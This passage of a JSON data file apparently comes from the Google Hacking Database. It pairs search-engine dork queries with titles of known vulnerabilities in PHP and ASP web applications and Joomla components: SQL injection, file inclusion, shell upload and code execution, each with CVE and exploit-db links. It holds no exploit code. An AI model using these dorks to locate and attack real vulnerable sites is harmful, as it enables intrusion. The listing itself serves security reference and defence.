"http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+bSpeak+1.10%22", "shortDescription": "\"Powered by bSpeak 1.10\"", "textualDescription": "bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability - CVE: 2009-1747: http://www.exploit-db.com/exploits/8751" }, { "signatureReferenceNumber": "2789", "link": "https://www.exploit-db.com/ghdb/2789/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+osCommerce", "shortDescription": "Powered by osCommerce", "textualDescription": "osCommerce Online Merchant 2.2 RC2a Code Execution: http://www.exploit-db.com/exploits/9556" }, { "signatureReferenceNumber": "2790", "link": "https://www.exploit-db.com/ghdb/2790/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:choosecard.php%3Fcatid%3D", "shortDescription": "inurl:choosecard.php?catid=", "textualDescription": "post Card ( catid ) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/11892" }, { "signatureReferenceNumber": "2791", "link": "https://www.exploit-db.com/ghdb/2791/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_jphoto%22", "shortDescription": "inurl:\"com_jphoto\"", "textualDescription": "Joomla Component com_jphoto SQL Injection Vulnerability - (id) - CVE: 2009-4598: http://www.exploit-db.com/exploits/10367" }, { "signatureReferenceNumber": "2792", "link": "https://www.exploit-db.com/ghdb/2792/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+e107_plugins/easyshop/easyshop.php", "shortDescription": "allinurl: e107_plugins/easyshop/easyshop.php", "textualDescription": "e107 Plugin EasyShop (category_id) Blind SQL Injection - CVE: 2008-4786: http://www.exploit-db.com/exploits/6852" }, { "signatureReferenceNumber": "2793", "link": "https://www.exploit-db.com/ghdb/2793/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_koesubmit%22", "shortDescription": "inurl:\"com_koesubmit\"", "textualDescription": "Mambo com_koesubmit 1.0.0 Remote File Inclusion - CVE: 2009-3333: http://www.exploit-db.com/exploits/9714" }, { "signatureReferenceNumber": "2794", "link": "https://www.exploit-db.com/ghdb/2794/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+PHP+Advanced+Transfer+Manager+v1.10+-+%402002+Bugada+Andrea", "shortDescription": "Powered by PHP Advanced Transfer Manager v1.10 - @2002 Bugada Andrea", "textualDescription": "PHP Advanced Transfer Manager v1.10 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11613" }, { "signatureReferenceNumber": "2795", "link": "https://www.exploit-db.com/ghdb/2795/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:add_soft.php", "shortDescription": "inurl:add_soft.php", "textualDescription": "Hotscripts Clone (cid) Remote SQL Injection Vulnerability - CVE: 2008-6405: http://www.exploit-db.com/exploits/6545" }, { "signatureReferenceNumber": "2796", "link": "https://www.exploit-db.com/ghdb/2796/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Absolute+Podcast%22", "shortDescription": "\"Powered by Absolute Podcast\"", "textualDescription": "Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability - CVE: 2008-6857: http://www.exploit-db.com/exploits/6882" }, { "signatureReferenceNumber": "2797", "link": "https://www.exploit-db.com/ghdb/2797/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+iScripts+EasyBiller", "shortDescription": "Powered by iScripts EasyBiller", "textualDescription": "iScripts easybiller v1.1 sqli vulnerability: http://www.exploit-db.com/exploits/13741" }, { "signatureReferenceNumber": "2798", "link": "https://www.exploit-db.com/ghdb/2798/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Copyright-2008%40zeejobsite.com%22", "shortDescription": "\"Copyright-2008@zeejobsite.com\"", "textualDescription": "ZEEJOBSITE 2.0 Remote File Upload Vulnerability - CVE: 2008-6913: http://www.exploit-db.com/exploits/7062" }, { "signatureReferenceNumber": "2799", "link": "https://www.exploit-db.com/ghdb/2799/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+By+phpCOIN+v1.2.1%22+/+%22mod.php%3Fmod%3Dfaq%22", "shortDescription": "\"Powered By phpCOIN v1.2.1\" / \"mod.php?mod=faq\"", "textualDescription": "phpCOIN 1.2.1 (mod.php) LFI Vulnerability - CVE: 2010-0953: http://www.exploit-db.com/exploits/11641" }, { "signatureReferenceNumber": "2800", "link": "https://www.exploit-db.com/ghdb/2800/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Foption%3Dcom_jp_jobs%22", "shortDescription": "inurl:\"index.php?option=com_jp_jobs\"", "textualDescription": "Joomla component jp_jobs SQL Injection Vulnerability - CVE: 2010-1350: http://www.exploit-db.com/exploits/12037" }, { "signatureReferenceNumber": "2801", "link": "https://www.exploit-db.com/ghdb/2801/", "category": "Advisories and Vulnerabilities", "querystring": "allinurl: Category.php?IndustrYID=", "shortDescription": "allinurl: Category.php?IndustrYID=", "textualDescription": "CmS (id) SQL Injection Vulnerability - CVE: 2009-2439: http://www.exploit-db.com/exploits/12333" }, { "signatureReferenceNumber": "2802", "link": "https://www.exploit-db.com/ghdb/2802/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=index2.php%3Foption%3Dcom_joomlaboard", "shortDescription": "index2.php?option=com_joomlaboard", "textualDescription": "Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability: http://www.exploit-db.com/exploits/3560" }, { "signatureReferenceNumber": "2803", "link": "https://www.exploit-db.com/ghdb/2803/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+By+WorldPay%22+inurl:productdetail.php", "shortDescription": "intext:\"Powered By WorldPay\" inurl:productdetail.php", "textualDescription": "WorldPay Script Shop (productdetail) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/10976" }, { "signatureReferenceNumber": "2804", "link": "https://www.exploit-db.com/ghdb/2804/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22cameralife/index.php%22", "shortDescription": "inurl:\"cameralife/index.php\"", "textualDescription": "Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6087: http://www.exploit-db.com/exploits/6710" }, { "signatureReferenceNumber": "2805", "link": "https://www.exploit-db.com/ghdb/2805/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:option%3Dcom_huruhelpdesk", "shortDescription": "inurl:option=com_huruhelpdesk", "textualDescription": "joomla component allvideos BLIND SQL injection Vulnerability: http://www.exploit-db.com/exploits/12137" }, { "signatureReferenceNumber": "2806", "link": "https://www.exploit-db.com/ghdb/2806/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:inc_membersareamanager.asp", "shortDescription": "inurl:inc_membersareamanager.asp", "textualDescription": "DMXReady Members Area Manager 1.2 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/7774" }, { "signatureReferenceNumber": "2807", "link": "https://www.exploit-db.com/ghdb/2807/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Tanyakan+Pada+Rumput+Yang+Bergoyang%22", "shortDescription": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "textualDescription": "Moa Gallery 1.2.0 Multiple Remote File Inclusion Vulnerabilities - CVE: 2009-4614: http://www.exploit-db.com/exploits/9522" }, { "signatureReferenceNumber": "2808", "link": "https://www.exploit-db.com/ghdb/2808/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/component/jesectionfinder/", "shortDescription": "inurl:/component/jesectionfinder/", "textualDescription": "Joomla Component JE Section Finder LFI Vulnerability - CVE: 2010-2680: http://www.exploit-db.com/exploits/14064" }, { "signatureReferenceNumber": "2809", "link": "https://www.exploit-db.com/ghdb/2809/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:phpMyAdmin", "shortDescription": "intitle:phpMyAdmin", "textualDescription": "phpMyAdmin Code Injection RCE - CVE: 2009-1151: http://www.exploit-db.com/exploits/8992" }, { "signatureReferenceNumber": "2810", "link": "https://www.exploit-db.com/ghdb/2810/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_phocagallery%22", "shortDescription": "inurl:\"com_phocagallery\"", "textualDescription": "Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14207" }, { "signatureReferenceNumber": "2811", "link": "https://www.exploit-db.com/ghdb/2811/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22member.php%3Fpage%3Dcomments%22", "shortDescription": "inurl:\"member.php?page=comments\"", "textualDescription": "6ALBlog (newsid) Remote SQL Injection Vulnerability - CVE: 2007-3451: http://www.exploit-db.com/exploits/4104" }, { "signatureReferenceNumber": "2812", "link": "https://www.exploit-db.com/ghdb/2812/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=''webboard+question.asp+QID''", "shortDescription": "''webboard question.asp QID''", "textualDescription": "PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability - CVE: 2008-1039: http://www.exploit-db.com/exploits/5185" }, { "signatureReferenceNumber": "2815", "link": "https://www.exploit-db.com/ghdb/2815/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Foption%3Dcom_ponygallery%22", "shortDescription": "inurl:\"index.php?option=com_ponygallery\"", "textualDescription": "Joomla Component Pony Gallery 1.5 SQL Injection Vulnerability - CVE: 2007-4046: http://www.exploit-db.com/exploits/4201" }, { "signatureReferenceNumber": "2816", "link": "https://www.exploit-db.com/ghdb/2816/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_dbquery%22+OR+%22index.php%3Foption%3Dcom_dbquery%22", "shortDescription": "inurl:\"com_dbquery\" OR \"index.php?option=com_dbquery\"", "textualDescription": "Joomla Component DBQuery 1.4.1.1 RFI Vulnerability - CVE: 2008-6841: http://www.exploit-db.com/exploits/6003/" }, { "signatureReferenceNumber": "2817", "link": "https://www.exploit-db.com/ghdb/2817/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Discuz!+1.0+%C2%A9+2002,+Crossday+Studio+of+11cn.org", "shortDescription": "Powered by Discuz! 1.0 \u00a9 2002, Crossday Studio of 11cn.org", "textualDescription": "Discuz 1.03 SQL Injection Exploit Vulnerability: http://www.exploit-db.com/exploits/10861" }, { "signatureReferenceNumber": "2818", "link": "https://www.exploit-db.com/ghdb/2818/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Power+by+donghungx.+Copyright+%C2%A9+2008+AttMp3.com.+All+rights+reserved.", "shortDescription": "Power by donghungx. Copyright \u00a9 2008 AttMp3.com. All rights reserved.", "textualDescription": "SongForever.com Clone Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11476" }, { "signatureReferenceNumber": "2821", "link": "https://www.exploit-db.com/ghdb/2821/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22PowerMovieList+0.14+Beta+Copyright%22", "shortDescription": "\"PowerMovieList 0.14 Beta Copyright\"", "textualDescription": "PowerMovieList 0.14b (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8062" }, { "signatureReferenceNumber": "2822", "link": "https://www.exploit-db.com/ghdb/2822/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22powered+by+MODx%22", "shortDescription": "\"powered by MODx\"", "textualDescription": "MODx CMS 0.9.2.1 (FCKeditor) Remote File Include Vulnerability - CVE: 2006-5730: http://www.exploit-db.com/exploits/2706/" }, { "signatureReferenceNumber": "2824", "link": "https://www.exploit-db.com/ghdb/2824/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+words+tag+script%22", "shortDescription": "\"Powered by words tag script\"", "textualDescription": "Words tag script 1.2 (word) Remote SQL Injection Vulnerability - CVE: 2008-3945: http://www.exploit-db.com/exploits/6336" }, { "signatureReferenceNumber": "2825", "link": "https://www.exploit-db.com/ghdb/2825/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+osCMax+v2.0%22+%2C+%22Copyright+@%22+%22RahnemaCo.com%22", "shortDescription": "\"Powered by osCMax v2.0\" , \"Copyright @\" \"RahnemaCo.com\"", "textualDescription": "osCMax 2.0 (fckeditor) Remote File Upload: http://www.exploit-db.com/exploits/11771" }, { "signatureReferenceNumber": "2827", "link": "https://www.exploit-db.com/ghdb/2827/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=FrontAccounting", "shortDescription": "FrontAccounting", "textualDescription": "FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability - CVE: 2007-4279: http://www.exploit-db.com/exploits/4269" }, { "signatureReferenceNumber": "2828", "link": "https://www.exploit-db.com/ghdb/2828/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+Egorix", "shortDescription": "Powered by Egorix", "textualDescription": "EPOLL SYSTEM 3.1 (password.dat) Disclosure: http://www.exploit-db.com/exploits/7864" }, { "signatureReferenceNumber": "2830", "link": "https://www.exploit-db.com/ghdb/2830/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=intext%3A%22Free+Ecommerce+Shopping+Cart+Software+by+ViArt%22+%2B%22Your+shopping+cart+is+empty%21%22+%2B+%22Products++Search%22+%2B%22Advanced+Search%22+%2B+%22All+Categories%22", "shortDescription": "intext:\"Free Ecommerce Shopping Cart Software by ViArt\" +\"Your shopping cart is empty!\" + \"Products Search\" +\"Advanced Search\" + \"All Categories\"", "textualDescription": "ViArt Shopping Cart 3.5 Multiple Remote Vulnerabilities - CVE: 2008-6758: http://www.exploit-db.com/exploits/7628" }, { "signatureReferenceNumber": "2831", "link": "https://www.exploit-db.com/ghdb/2831/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22powered+by+WonderEdit+Pro%22", "shortDescription": "\"powered by WonderEdit Pro\"", "textualDescription": "WonderEdit Pro CMS (template_path) Remote File Include Vulnerabilities - CVE: 2006-3422: http://www.exploit-db.com/exploits/1982" }, { "signatureReferenceNumber": "2833", "link": "https://www.exploit-db.com/ghdb/2833/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3A%22kgb19%22", "shortDescription": "inurl:\"kgb19\"", "textualDescription": "KGB 1.9 (sesskglogadmin.php) Local File Include - CVE: 2007-0337: http://www.exploit-db.com/exploits/3134" }, { "signatureReferenceNumber": "2834", "link": "https://www.exploit-db.com/ghdb/2834/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=allinurl%3Abuyer%2Findex.php%3FProductID%3D", "shortDescription": "allinurl:buyer/index.php?ProductID=", "textualDescription": "Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12609" }, { "signatureReferenceNumber": "2835", "link": "https://www.exploit-db.com/ghdb/2835/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22powered+by+Sitellite%22", "shortDescription": "\"powered by Sitellite\"", "textualDescription": "Sitellite CMS 4.2.12 (559668.php) Remote File Inclusion Vulnerability - CVE: 2007-3228: http://www.exploit-db.com/exploits/4071" }, { "signatureReferenceNumber": "2836", "link": "https://www.exploit-db.com/ghdb/2836/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22PHP+Link+Portal+v1.95.1+%C3%82%C2%A9+Big+Resources%2C+Inc.%22", "shortDescription": "\"PHP Link Portal v1.95.1 \u00c2\u00a9 Big Resources, Inc.\"", "textualDescription": "Built2Go PHP Link Portal 1.95.1 Remote File Upload Vulnerability: http://www.exploit-db.com/exploits/7644" }, { "signatureReferenceNumber": "2841", "link": "https://www.exploit-db.com/ghdb/2841/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%5B+Copyright+2005-2006+phpDirectorySource%C3%A2%E2%80%9E%C2%A2%2C+all+rights+reserved+%5D", "shortDescription": "[ Copyright 2005-2006 phpDirectorySource\u00e2\u201e\u00a2, all rights reserved ]", "textualDescription": "phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4681: http://www.exploit-db.com/exploits/9226" }, { "signatureReferenceNumber": "2843", "link": "https://www.exploit-db.com/ghdb/2843/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+Comdev+News+Publisher%22", "shortDescription": "\"Powered by Comdev News Publisher\"", "textualDescription": "Comdev News Publisher Remote SQL Injection Vulnerability - CVE: 2008-1872: http://www.exploit-db.com/exploits/5362" }, { "signatureReferenceNumber": "2844", "link": "https://www.exploit-db.com/ghdb/2844/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+By%3A+AJ+Square+Inc", "shortDescription": "Powered By: AJ Square Inc", "textualDescription": "AJ Article Persistent XSS Vulnerability - CVE: 2010-2917: http://www.exploit-db.com/exploits/14354" }, { "signatureReferenceNumber": "2845", "link": "https://www.exploit-db.com/ghdb/2845/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22index.php%3Foption%3Dcom_sef%22+%2F+%22com_sef%22", "shortDescription": "\"index.php?option=com_sef\" / \"com_sef\"", "textualDescription": "Joomla Component Sef (com_sef) - LFI Vulnerability: http://www.exploit-db.com/exploits/14213" }, { "signatureReferenceNumber": "2846", "link": "https://www.exploit-db.com/ghdb/2846/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Aoption%3Dcom_huruhelpdesk", "shortDescription": "inurl:option=com_huruhelpdesk", "textualDescription": "joomla component huruhelpdesk SQL injection Vulnerability: http://www.exploit-db.com/exploits/12124" }, { "signatureReferenceNumber": "2847", "link": "https://www.exploit-db.com/ghdb/2847/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Ainc_securedocumentlibrary.asp", "shortDescription": "inurl:inc_securedocumentlibrary.asp", "textualDescription": "DMXReady Secure Document Library 1.1 Remote SQL Injection Vuln - CVE: 2009-0428: http://www.exploit-db.com/exploits/7787" }, { "signatureReferenceNumber": "2848", "link": "https://www.exploit-db.com/ghdb/2848/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=powered+by+dolphin", "shortDescription": "Powered by Dolphin", "textualDescription": "Dolphin v7.0.3 Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15400" }, { "signatureReferenceNumber": "2849", "link": "https://www.exploit-db.com/ghdb/2849/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3A%22php%2FshowContent.php%3Flinkid%3D%22", "shortDescription": "inurl:\"php/showContent.php?linkid=\"", "textualDescription": "Worldviewer.com CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12163" }, { "signatureReferenceNumber": "2850", "link": "https://www.exploit-db.com/ghdb/2850/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=sitou+timou+tumou+tou", "shortDescription": "sitou timou tumou tou", "textualDescription": "Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability - CVE: 2009-4622: http://www.exploit-db.com/exploits/9635" }, { "signatureReferenceNumber": "2852", "link": "https://www.exploit-db.com/ghdb/2852/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A.asp%3F+++Powered+by+Comersus+ASP+Shopping+Cart", "shortDescription": "inurl:.asp? Powered by Comersus ASP Shopping Cart", "textualDescription": "Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7259" }, { "signatureReferenceNumber": "2853", "link": "https://www.exploit-db.com/ghdb/2853/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Aindex.php%3Foption%3Dcom_lowcosthotels", "shortDescription": "inurl:index.php?option=com_lowcosthotels", "textualDescription": "Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln - CVE: 2008-5864: http://www.exploit-db.com/exploits/7567" }, { "signatureReferenceNumber": "2854", "link": "https://www.exploit-db.com/ghdb/2854/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Vibro-School+CMS+by+nicLOR.net", "shortDescription": "Vibro-School CMS by nicLOR.net", "textualDescription": "Vibro-School-CMS (nID) Remote SQL injection Vulnerability - CVE: 2008-6795: http://www.exploit-db.com/exploits/6981" }, { "signatureReferenceNumber": "2855", "link": "https://www.exploit-db.com/ghdb/2855/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Absolute+Poll+Manager+XE%22", "shortDescription": "\"Absolute Poll Manager XE\"", "textualDescription": "Absolute Poll Manager XE 4.1 Cookie Handling Vulnerability - CVE: 2008-6860: http://www.exploit-db.com/exploits/6883" }, { "signatureReferenceNumber": "2856", "link": "https://www.exploit-db.com/ghdb/2856/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Copyright+2010.+Software+Index", "shortDescription": "Copyright 2010. Software Index", "textualDescription": "PishBini Footbal XSS and SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14000" }, { "signatureReferenceNumber": "2857", "link": "https://www.exploit-db.com/ghdb/2857/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A%22com_linkdirectory%22", "shortDescription": "inurl:\"com_linkdirectory\"", "textualDescription": "Joomla Link Directory Component 1.0.3 Remote Include Vulnerability: http://www.exploit-db.com/exploits/2214" }, { "signatureReferenceNumber": "2858", "link": "https://www.exploit-db.com/ghdb/2858/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Acom_manager", "shortDescription": "inurl:com_manager", "textualDescription": "Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12257" }, { "signatureReferenceNumber": "2859", "link": "https://www.exploit-db.com/ghdb/2859/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Developed+by+Infoware+Solutions%22", "shortDescription": "\"Developed by Infoware Solutions\"", "textualDescription": "My PHP Dating (success_story.php id) SQL Injection Vulnerability - CVE: 2008-4705: http://www.exploit-db.com/exploits/6754" }, { "signatureReferenceNumber": "2860", "link": "https://www.exploit-db.com/ghdb/2860/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by%3A+Yes+Solutions%22", "shortDescription": "\"Powered by: Yes Solutions\"", "textualDescription": "Yes Solutions - Webapp SQL Injection: http://www.exploit-db.com/exploits/11368" }, { "signatureReferenceNumber": "2861", "link": "https://www.exploit-db.com/ghdb/2861/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=allinurl%3A%22verliadmin%22", "shortDescription": "allinurl:\"verliadmin\"", "textualDescription": "VerliAdmin 0.3 (index.php) Remote File Include - CVE: 2006-6666: http://www.exploit-db.com/exploits/2944" }, { "signatureReferenceNumber": "2862", "link": "https://www.exploit-db.com/ghdb/2862/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+UNAK-CMS%22", "shortDescription": "\"Powered by UNAK-CMS\"", "textualDescription": "UNAK-CMS 1.5 (dirroot) Remote File Include Vulnerabilities - CVE: 2006-4890: http://www.exploit-db.com/exploits/2380" }, { "signatureReferenceNumber": "2863", "link": "https://www.exploit-db.com/ghdb/2863/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A%22com_quickfaq%22", "shortDescription": "inurl:\"com_quickfaq\"", "textualDescription": "Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability - CVE: 2010-2845: http://www.exploit-db.com/exploits/14296" }, { "signatureReferenceNumber": "2864", "link": "https://www.exploit-db.com/ghdb/2864/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=Powered+by+PBBoard%C2%A9+2009+Version+2.0.5", "shortDescription": "Powered by PBBoard\u00a9 2009 Version 2.0.5", "textualDescription": "PBBoard Version 2.0.5 Mullti Vulnerability: http://www.exploit-db.com/exploits/11570" }, { "signatureReferenceNumber": "2865", "link": "https://www.exploit-db.com/ghdb/2865/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+EZCMS%22", "shortDescription": "\"Powered by EZCMS\"", "textualDescription": "EZCMS 1.2 (bSQL/Admin Byapss) Multiple Remote Vulnerabilities - CVE: 2008-2921: http://www.exploit-db.com/exploits/5819" }, { "signatureReferenceNumber": "2866", "link": "https://www.exploit-db.com/ghdb/2866/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Aindex.php%3Fmenu%3Dadorder", "shortDescription": "inurl:index.php?menu=adorder", "textualDescription": "ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3944: http://www.exploit-db.com/exploits/6362" }, { "signatureReferenceNumber": "2867", "link": "https://www.exploit-db.com/ghdb/2867/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=allinurl%3A%22com_accombo%22", "shortDescription": "allinurl:\"com_accombo\"", "textualDescription": "Mambo Component accombo 1.x (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5279" }, { "signatureReferenceNumber": "2868", "link": "https://www.exploit-db.com/ghdb/2868/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+Scratcher%22", "shortDescription": "\"Powered by Scratcher\"", "textualDescription": "Scratcher (SQL/XSS) Multiple Remote Vulnerability - CVE: 2010-1742: http://www.exploit-db.com/exploits/12458" }, { "signatureReferenceNumber": "2869", "link": "https://www.exploit-db.com/ghdb/2869/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3A%2Fcomponents%2Fje-media-player.html%3F", "shortDescription": "inurl:/components/je-media-player.html?", "textualDescription": "Joomla JE Media Player Component LFI Vulnerability: http://www.exploit-db.com/exploits/14060" }, { "signatureReferenceNumber": "2870", "link": "https://www.exploit-db.com/ghdb/2870/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+How2asp%22", "shortDescription": "\"Powered by How2asp\"", "textualDescription": "How2ASP.net Webboard 4.1 Remote SQL Injection Vulnerability - CVE: 2008-2417: http://www.exploit-db.com/exploits/5638" }, { "signatureReferenceNumber": "2871", "link": "https://www.exploit-db.com/ghdb/2871/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+PHPBasket%22", "shortDescription": "\"Powered by PHPBasket\"", "textualDescription": "PHPBasket (product.php pro_id) SQL Injection Vulnerability - CVE: 2008-3713: http://www.exploit-db.com/exploits/6258" }, { "signatureReferenceNumber": "2873", "link": "https://www.exploit-db.com/ghdb/2873/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Forum+Active+Bulletin+Board+version+1.1+b%C3%A9ta+2%22", "shortDescription": "\"Forum Active Bulletin Board version 1.1 b\u00e9ta 2\"", "textualDescription": "Active Bulletin Board" }, { "signatureReferenceNumber": "2874", "link": "https://www.exploit-db.com/ghdb/2874/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=inurl%3Amodule%3DMy_eGallery+pid", "shortDescription": "inurl:module=My_eGallery pid", "textualDescription": "MDPro Module My_eGallery (pid) Remote SQL Injection - CVE: 2009-0728: http://www.exploit-db.com/exploits/8100" }, { "signatureReferenceNumber": "2875", "link": "https://www.exploit-db.com/ghdb/2875/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=fr&source=hp&q=%22Powered+by+Dayfox+Designs%22", "shortDescription": "\"Powered by Dayfox 